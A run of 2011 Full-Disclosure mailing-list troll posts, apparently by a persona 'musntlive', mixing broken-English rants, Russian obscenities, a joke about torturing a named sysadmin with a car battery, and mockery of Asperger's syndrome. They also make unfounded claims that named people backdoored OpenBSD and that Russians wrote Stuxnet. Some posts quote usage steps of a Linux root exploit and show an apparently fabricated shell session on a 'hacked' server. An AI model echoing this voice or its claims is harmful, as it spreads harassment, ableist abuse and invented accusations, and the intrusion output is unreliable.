Re: [Full-disclosure] Getting Off the Patch (is pointing out obvious)
2011/1/17 Cal Leeming [Simplicity Media Ltd] : > Please reply in Russian, and I'll get one of my colleagues to translate. так как Вы хотите русский язык, вот - некоторые российские заголовки от местных новостей lulululul А несколько дней назад начальник управления ЗАГС Москвы Ирина Муравьева, подводя итоги прошлого года, лишь подтвердила всероссийскую статистику. По ее словам, только 70 процентов маленьких москвичей родились в официально зарегистрированных семьях. Если учесть, что всего в столице было зарегистрировано 123,638 тысячи новорожденных, то как минимум 400 тысяч из них оказались внебрачными. Далеко не всегда речь идет о неполных семьях и мужчинах, которые сбежали от подруги, узнав о ее интересном положении, просто сейчас многие влюбленные не считают, что официальная регистрация их союза укрепит внутрисемейные отношения. "Мы завели ребенка, разве это не говорит о том, что у нас все по-настоящему серьезно?" -- утверждают семьи без штампа, пеняя на бесчисленные количество своих друзей, которые разбежались через три-четыре года официальной семейной жизни. Кроме того, "неоформленные" супруги говорят, что их жизнь честней, так как в ее основе лежат чувства, а не пресловутая обязанность по закону. Несмотря на все возрастающую тенденцию так называемых "гражданских" браков (юридически означает зарегистрированный брак между двумя людьми, но в быту употребляется как синоним "фактического"), у такого образа жизни есть множество противников, которые утверждают, что жить вместе и растить общих детей без похода в ЗАГС не то чтобы плохо, а просто небезопасно. При определенных обстоятельствах, если пара разойдется или с одним из партнеров случится какое-то несчастье, вторая половина и ребенок могут остаться без кола и двора. Раз отношения не оформлены официально, то и претензий на наследство быть не может. Еще один интересный момент: некоторое время назад европейские психологи провели масштабное исследование с целью выяснить, в каких семьях -- официальных или неофициальных -- лучше живется детям. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Getting Off the Patch (is pointing out obvious)
2011/1/17 Cal Leeming [Simplicity Media Ltd] : > I have absolutely no idea what you just said lol. > This part was especially amusing: > "Is when we tie up Pawel in lobby with is cable to car battery example is > set". > Please reply in Russian, and I'll get one of my colleagues to translate. не предполагайте, что я - российский идиот даже тип русских, более шикарный чем я. это находится в Америке, что Вы называете ложным флагом, и предназначается, чтобы отбросить идиотов как Вы от понимания, я являюсь фактически китайским. Заметьте, как я никогда не могу произносить письмо R и вместо этого использовать письмо L??!! даже самые основные напевают, поймал это несоответствие. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Getting Off the Patch (is pointing out obvious)
2011/1/17 Cal Leeming [Simplicity Media Ltd] : > I have absolutely no idea what you just said lol. > This part was especially amusing: > "Is when we tie up Pawel in lobby with is cable to car battery example is > set". > Please reply in Russian, and I'll get one of my colleagues to translate. Оставьте меня в покое Хуй тебе в роть!! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Getting Off the Patch (is pointing out obvious)
On Mon, Jan 17, 2011 at 4:30 PM, Cal Leeming [Simplicity Media Ltd] wrote: > Okay, so there's like 40 odd rather long responses to this discussion, can > someone give a one word answer as to whether or not they are worth taking > the time to read through? Is obvious you is not in this game to learn therefore I ask that you leave. All is say by both Thor and is Pete is worth is weight on gold. Valdis, is sometimes maybe yes good to read. Thor is shark, is worth reading to is learn from everytimes. Please, is no bother this thread or list with such stupid answers yes? Is musntlive has better solution for no is patching. Unplug is your network and then is all you worry about is local threat. With enough waterboarding, is one can defend against the local attack vectors, for is example: Pawel is system administrator for is catch him doing something sneaky. Is when we tie up Pawel in lobby with is cable to car battery example is set. Other workers is now know: "Data is private as used to be his balls. Pawel is like seeing other people's data, is now we see his data. Look at Pawel when we is touch is two battery terminals!! Maybe must change slogan: -- "InSecurity -- is we not play this is game!!" (TM musntlive 2011) [ WARNING -- FULL DISCLOSURE: -- Pawel was is not harmed during is typing of is email I write you. His name is for only scenario purposes only. DISCLAIMER: -- NO IS WORKERS, COWORKERS, CONTRACTORS, IS THIRD PARTY VENDORS WAS IS HARMED DURING IS TYPING OF IS LETTER. ANY IS RELATED INJURIES IS HEREBYTOFORTHOU COINCIDENTAL. MUSNTLIVE IS IS NOT RESPONSIBLE FOR IS CLAIMS IS MADE BY ANYONE IS AFTER 17 JAN 2011 00:48 ] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Getting Off the Patch
On Mon, Jan 17, 2011 at 12:24 PM, Thor (Hammer of God) wrote: > (top posting) > > So, you have no data to support your claim other than "I think that sucks, so > this must be better." Thanks. > > t Hello full disclosure!! I is like to warn you about not having backup to is support claims when responding to Thor. He is will eat you like акула. Is I say this now with musntlive supported data: -- 'I is think that sucks so is my solution is better 'for me' and is Thor no like I has friend name Bloodaxe and is no, I not speak of Chris Coogans ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Free Dancho Movement
Hello Full-Disclosure!! I is like to talk with you for serious issue affecting hackers is around the world. Assburgers Syndrome. Is say by Wiki -- 'Asperger syndrome or Asperger's syndrome is an autism spectrum disorder that is characterized by significant difficulties in social interaction, along with restricted and repetitive patterns of behavior and interests. It differs from other autism spectrum disorders by its relative preservation of linguistic and cognitive development. Although not required for diagnosis, physical clumsiness and atypical use of language are frequently reported.' Is now explained by mustnlive -- 'Assburgers Syndrome is a relevantly new is syndrome more frequently is in used by is wanna-be hackers who is under arrest, investigation. Is defensive posture used by creative malicious hackers who is has no social interaction other than is use of IRC, mailing-list, phpBB and is of course full disclosure. Although is not required for diagnosis, Assburgers sufferers are is usually pathological liars and scam artists who is been has been caught with warez, carding, etc, and is now are in hot water with authority. Is say by Wiki -- 'The exact cause is unknown, although research supports the likelihood of a genetic basis; brain imaging techniques have not identified a clear common pathology. There is no single treatment, and the effectiveness of particular interventions is supported by only limited data.' Is now explained by musntlive -- 'The exact cause is a case of is guilty by is reason of stupidity. Although is research is may support or is conclude brain deficiencies, for wannabe hackers like Adrian Lamo, Gary McKinnon and now is Dancho, this is not case. musntlive studies say is these pizda hackers is just stupid and is no way Assburger victims. Is say by Wiki -- Some researchers and people with Asperger's have advocated a shift in attitudes toward the view that it is a difference, rather than a disability that must be treated or cured.' Is now explained by musntlive --'As is was read on good blog (http://phil251.eripsa.org/?p=1281) brains is must not be separated from their is respective bodies. Musntlive is believe by means of waterboarding and is or neurologically is transplant monkey brain with Adrian Lamo brain, Adrian is stop lying and selling out friends. In is event of Gary McKinnon (so1o) is replace his brain with Jar Jar Binks is resolve his nuisance use of Star Wars 1337ed nicknames. As is case of Dancho, who is likely being hospitalized against is his will, understand that is hospitals only forcefully is hospitalize the most dangerous types. Is mean Dancho is schizophrenic. He is not need help as when he is released he is now have full deniability -- 'it was not me it was my other half'' Please full disclosure do not is feed the trolls. Free Dancho! Everyone is know cyberorganizedIscrime organizations with is much power is have him committed! Is not like is easier to run him over, no answer is to leave a record trail of having him committed. Assburgers is real is what will you do when КГБ is come knocking for you? Is obvious play dead!! I is like to say more but is maybe someone tapping entire techno.ru ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The OpenBSD IPsec-Stuxnet connection.
Is nothing to see please do not feed troll. Everyone is see different picture. Stuxnet is make by Russian coders who is was hired to work on systems. Is you use maltego to connect the dots is via domains used, is you see real picture of nuclear blackmail. Israel and US is use someone elses work to take credit for. What is not seen or known is, Russian coders now living in New Zealand is responsible for this attack [shhh no tell the world the truth]. Is imagine for is moment you hijack complete nuclear facility without care of possible fallout from accident. As criminal you is has nothing to worry about. As government, is you cause an Iranian Chernobyl, you is will have to deal with entire world. Do not be fooled. Jason is has no time for Stuxnet as is obvious he is has been busy hiding his backdoor from discovery ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Remedy for Getting Off is Patch
Hello full disclosure!!! I'd like to warn you about Patches. As is everyone knows, patches is are pieces of is software that software manufacturers is make to fix their is horrendous programs. Is you not patch, you is get owned. Gone is under sixty seconds. As is say on Wikipedia -- "A security patch is a change applied to an asset to correct the weakness described by a vulnerability. This corrective action will prevent successful exploitation and remove or mitigate a threat’s capability to exploit a specific vulnerability in an asset. Security patches are the primary method of fixing security vulnerabilities in software. Currently Microsoft releases its security patches once a month, and other operating systems and software projects have security teams dedicated to releasing the most reliable software patches as soon after a vulnerability announcement as possible. Security patches are closely tied to responsible disclosure." As in say by musntlive -- "A security patch is is a change applied is to an asset is to correct ignorance and stupidities of developers of is application because is their application is ownerizable. This is corrective action and is nothing more than is bandaid to prevent temporary exploitation and is remove vulnerability for short amount of is time. Security patches is only method of vendors like is Microsoft is to cover their осёл. 'Is we is Microsoft and is sure we make sloppy software.' All software is beta присоска! And is you is stupid for buying is software. Security patches is closely tied with sloppy coding and is rushing to market." Is argue by Thor (who is musntlive respect) as is is arguement by Valdis (who is musntlive respect is усы) is Pete Herzog (who is musntlive respect) say: 'defense in depth' -- "the more reason to implement an array of controls (defense in width) for the interactive points rather than rely on patches to fix ONLY the problems you know about." Now is musntlive lay smack down on is everyone even is I respect all of you. Is Pete you must understand is I pay $40,000.00 or give 10,000 little сурок trade for software - I is expect software to is work how I want is work. I is build my business on is this application so when is code is changed now I is has to maybe accept it yes or is not accept it. Is I accept is change is software maybe break my system and is cost me money or possibly worse сурок!! Is who присоска now!!??!!?? Is patch no answer!! Because is New Year musntlive offers everyone fair solution to is fix: OpenBSD. Now is when you have security issues since is your machine backdoored is you can ask Theo or the FBI to fix is your machine. Thank is you all for support in 2011 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Getting root, the hard way
> * Usage: > * gcc -w caps-to-root.c -o caps-to-root > * sudo setcap cap_sys_admin+ep caps-to-root > * ./caps-to-root Is further you fail because why see above: > * sudo setcap cap_sys_admin+ep caps-to-root Is I had sudo for why I has to run this code when I can sudo su. Is you must change advisory to "это пиздец!! Lame Race Condition for You Is Already Has Root" ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Getting root, the hard way
Is code no work: # uname -a OpenBSD cyka.etopizdets.ru 4.7 WRIGHTKERNEL#1337 i386 # md5 danposerberg.c MD5 (danposerberg.c) = 26b1dd146a3b96c63539f551a8741f18 # gcc danposerberg.c -o hakaruski danposerberg.c:53:30: linux/capability.h: No such file or directory danposerberg.c: In function `main': danposerberg.c:155: error: `PF_PHONET' undeclared (first use in this function) danposerberg.c:155: error: (Each undeclared identifier is reported only once danposerberg.c:155: error: for each function it appears in.) danposerberg.c:173: warning: assignment makes pointer from integer without a cast danposerberg.c:174: warning: assignment makes pointer from integer without a cast danposerberg.c:191: error: `MAP_ANONYMOUS' undeclared (first use in this function) danposerberg.c:200: warning: assignment makes integer from pointer without a cast danposerberg.c:204: warning: assignment makes integer from pointer without a cast danposerberg.c:208: warning: assignment makes integer from pointer without a cast danposerberg.c:231: warning: assignment makes pointer from integer without a cast # iswhere capability.h ksh: iswhere: not found # whereis capability.h # emacs danposerberg.c # gcc -w danposerberg.c -o fixeruski danposerberg.c:53:30: linux/capability.h: No such file or directory danposerberg.c: In function `main': danposerberg.c:155: error: `PF_PHONET' undeclared (first use in this function) danposerberg.c:155: error: (Each undeclared identifier is reported only once danposerberg.c:155: error: for each function it appears in.) danposerberg.c:191: error: `MAP_ANONYMOUS' undeclared (first use in this function) # ed danposerberg.c # gcc -o fixeruski danposerberg.c # ./fixeruski SEGMENTATION FAULT Is no work!! Is your machine is already backdoored see uname output So i is retest to Linux machine: $ uname -a Linux pizda 2.6.29.4 #1 SMP Thu Dec 21 10:57:32 EDT 2003 i386 GNU/Linux $ echo "is test for backdoors in code" && ruby -pe 'next if not /jason|open|theo/' danposerberg.c $ echo "code is been test for openbsd backdoors!! is no backdoors" $ gcc -o fixeruski -w danposerberg.c $ ./fixeruski ^C ^C ^C ^C ^C ^C ^C ^Z ^Z^Z^Z^Z^Z ^Z^Z^Z^Z^Z^Z^Z^C^C^C^C^C $ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Is Security Disclosure
Hello Full Disclosure!! I is like to warn you is about New Years worldwide. Is time for to many is drink and drive. For this is MustnLive say: Is be safe this is New Years, don't is drink and drive because is you might is spill drink. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FreeBSD backdoor full disclosure
Is MusntLive listen to Винт И Мэф, Rena, Timati and Mad-A is morning MusntLive realize is he is too real for is game and is come to conclusion that is people is know MusntLive on security point [is most real]!! So while is many think to make fun of MusntLive, is MusntLive get last laugh. Is people say is 'OMG MusntLive is not outted FreeBSD nor NetBSD' troll statement, is people who not understand is coding port process for to OpenBSD from FreeBSD. Is people say 'OMG is MusntLive is not speak of FreeBSD or Linux so is he must be jealous zealot' and is is not true. MusntLive is has been always is operating system neutral and is no support one OS over is another!! So is for the not knowing I break it down: OpenBSD is been rumored to have backdoor. Is we go back and look at disclosure we is see accuser is say 'OpenBSD developers is was paid..' This is mean that is so what code is come from FreeBSD, is not FreeBSD developer[s] who is backdoor code. Is OpenBSD and is do so under Theo's eye!! Is question: 'I is created code.c and I is release it. Paul Schmehl is come and take code.c and is backdoor it.' a) Is I to is blame? b) Is Schmehl responsible for is backdoor c) Is my whole developmenter team is responsible Answer is of course is b). Is Paul Schmehl is only responsible. Do not is feed trolls full disclosure. For is people like Dave Nett, Paul Schmehl and is handful of is others who is must make confused on is real security issue. Paul do not backdoor is code he commit for is because he is good guy. Old and senile for is true but is has morals. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] backtrack-linux.org hacked?
I is also hack machine is too!! | ||o |---.,---.,---.|__/ ,---.,---.. .,---.|__/ . | |,---||| \ |---'|| |`---.| \ | ` '`---^`---'` ``---'``---'`---'` `` gary7> uname -a SunOS gary7 5.8 Generic_108528-21 sun4u sparc SUNW,Ultra-Enterprise-1 gary7> uname -X System = SunOS Node = gary7 Release = 5.8 KernelID = Generic_108528-21 Machine = sun4u BusType = Serial = Users = 8 OEM# = 0 Origin# = 1 NumCPU = 16 gary7> ifconfig | grep 208. inet 208.47.125.33 netmask 0xfff8 broadcast 208.47.125.1 gary7> w 3:58PM up 275 days, 10:22, 5 users, load averages: 0.13, 0.09, 0.08 USER TTY FROM LOGIN@ IDLE WHAT condorp6 67.210.226.207 20Dec10 2:31 - assange p7 sbcp1.dhs.gov 3:40PM - asinkov p4 131.84.179.30 16Nov10 - gary7> id uid=1011(asinkov) gid=1011(asinkov) groups=1011(asinkov) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
